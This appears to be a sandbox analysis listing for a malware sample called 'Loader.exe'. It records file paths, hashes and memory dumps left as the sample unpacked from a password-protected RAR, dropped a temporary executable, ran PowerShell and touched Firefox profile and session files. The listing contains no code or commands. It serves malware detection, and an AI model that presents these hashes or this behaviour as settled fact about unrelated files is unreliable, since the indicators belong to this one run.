C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | 90c25fc8a326cde248dd8ab4cd94b552 |
| SHA1 | b7e73aea962c2358ab865fe64c39fd7893be2621 |
| SHA256 | b0d06172b7537e7687fdb22d9917bf00d44adf477cc82a25da8a1a537f8fc04d |
| SHA512 | 856074f4a92f89ecace970d296186c15914ed4ba3a13db3caabf0efce5e6d2b9b2c4896e04277ead1d2ab26e97faa8eef2e39e5a01eb5670bfc8667953f91b64 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\prefs-1.js
| MD5 | d3a6ace8f20b45b04f51187c996b9e56 |
| SHA1 | d81c3addcc09e57f102368aa697a72881fc4b840 |
| SHA256 | ceda56b1298a7c8fe1c249f283e2972d8b2a09257ce02cd73ce0a1d4fe3b4552 |
| SHA512 | cc42aba9fa69c25292ef1af85b5acb1bec366baf4a7da0c2f1effe1aba91379b53f7d9258ad117e5ec35c1c276ec599b59bdf26314bf3dca17a8ce8e493746cd |
C:\Users\Admin\Downloads\Loader.eKmXoUI1.rar.part
| MD5 | 42e38327aa043c8973d77f002d2f1a33 |
| SHA1 | 2835af4a7efe108fdfb91d11436f5f773922eda2 |
| SHA256 | fe6255c6b1573472191a4a4390d4d3152b70224b23e4a71afe67144b7f183467 |
| SHA512 | d2f40726244d2752b35830f16513d9f64b1e598183312950bc0331df6ee44059eb5e3b3bfac4a6853478b449e2cf7a634d35d1c26a607301b1a6a5e6b5b73391 |
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\vg8iw5f0.default-release\sessionstore-backups\recovery.jsonlz4
| MD5 | ab9b6bbccae774bf4f714666d2efc22f |
| SHA1 | f4d247e6f2523f101655e516de893327a2800ab6 |
| SHA256 | 379126eefee0a5c2187b4fbc368072efdc60e809af09a9e8d88a0fa4e5e0bd33 |
| SHA512 | 23a81cafa78fdeedab2f8342d09115e6790d7110e76706b087941b5c7f0825107836f82f82abc358b900d6ed0915a28d0ee95d7fb053ab613b27e07869a6835e |
C:\Users\Admin\Downloads\Loader\password.txt
| MD5 | 1477c4e39ff2fed1baac4e4f489d0a4c |
| SHA1 | f1c5dde0136bbc26070d2a63e553177371cbbcf1 |
| SHA256 | 1eb716479b1705aad74bcc7d0a53e38a7df13f7e09bb9408a2073c81a297888e |
| SHA512 | 3eb875441744cea3919ffe23d540c7f9addcb55c66cf73f2bafb0c6adddbffc729daa860703251dfe579a3cfefb80f9441499cf83090472bd68e9e25d2d28d37 |
C:\Users\Admin\Downloads\Loader\Loader.rar
| MD5 | f32be7992696caff77f94dce6961089e |
| SHA1 | 0396281c809dc5f1ebb0d6e755d28e598d2ad506 |
| SHA256 | 9c54420994a1b38f19ad2d5ce56fd5b92693b0ca2f1052dd0e709d0b7ece7e2a |
| SHA512 | 418b177ea1a25aaac6c376a821443ee268ec6dc474b5ec6cef029587c817c6b8bc1eb7f96b6321aff83af7733fb5fcee644a64ec1dfff17efc4ac4bda9c1cc3b |
C:\Users\Admin\Downloads\Loader\Loader\Loader\Loader.exe
| MD5 | 31decf4cb27130221a8166ab23fccddc |
| SHA1 | 436c8647384cc0d28edbb718d842fd6f9d98d498 |
| SHA256 | 455af6216bf7abc51fb3d08d29862bd2dfafb1351fee7bb46b56b7af8e9ccb24 |
| SHA512 | 72805d772261d88728ce041552da872fa58b3c54104290dd5e6ea649b99529007a02a6b03ca05290ff2c030242804f1eb1237740966ab2a803617b9233bec4b8 |
memory/3528-336-0x0000000000770000-0x0000000000778000-memory.dmp
memory/3536-338-0x000002082D680000-0x000002082D6A2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mfdvk04e.rxq.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
C:\Users\Admin\AppData\Local\Temp\1o35kcks.mos0.exe
| MD5 | 01a2f455cbe0cc72c58c60acff46c5c5 |
| SHA1 | 7f447f7c8606725d3418f7f6b5c8a91ead0c246f |
| SHA256 | e8e12bc924dda41abbd2b38031b05a7c782e08bd6adccf4baaea3f44b6833462 |
| SHA512 | 31a09211f2d3275cb9ee4c0a6e7f814c1c9953fe73e27c46cec01c34b39b63096186c4009964e81c28f237d4384d7a3a67bc533f642a82c84f46fb3057b4c8f3 |
memory/4376-360-0x0000000000D00000-0x0000000000D4E000-memory.dmp
memory/4376-361-0x00000000056D0000-0x00000000056EE000-memory.dmp
memory/4376-362-0x00000000060D0000-0x0000000006674000-memory.dmp
memory/4376-363-0x0000000005BC0000-0x0000000005C52000-memory.dmp
memory/4376-364-0x0000000005B40000-0x0000000005B4A000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Loader.exe.log
| MD5 | 28d7fcc2b910da5e67ebb99451a5f598 |
| SHA1 | a5bf77a53eda1208f4f37d09d82da0b9915a6747 |
| SHA256 | 2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c |
| SHA512 | 2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 806286a9ea8981d782ba5872780e6a4c |
| SHA1 | 99fe6f0c1098145a7b60fda68af7e10880f145da |
| SHA256 | cd2c977928e78b2d39bba8a726308f17b2946ea3f1a432de209720f691450713 |
| SHA512 | 362df97f9fc9c2f546538814cd0402a364a286326219f03325f8cbd59d33f9d850c26daf42230f0bb4feb7e5134868a51e7a3d2f5bc136fe3de69d5d82c5ae2e |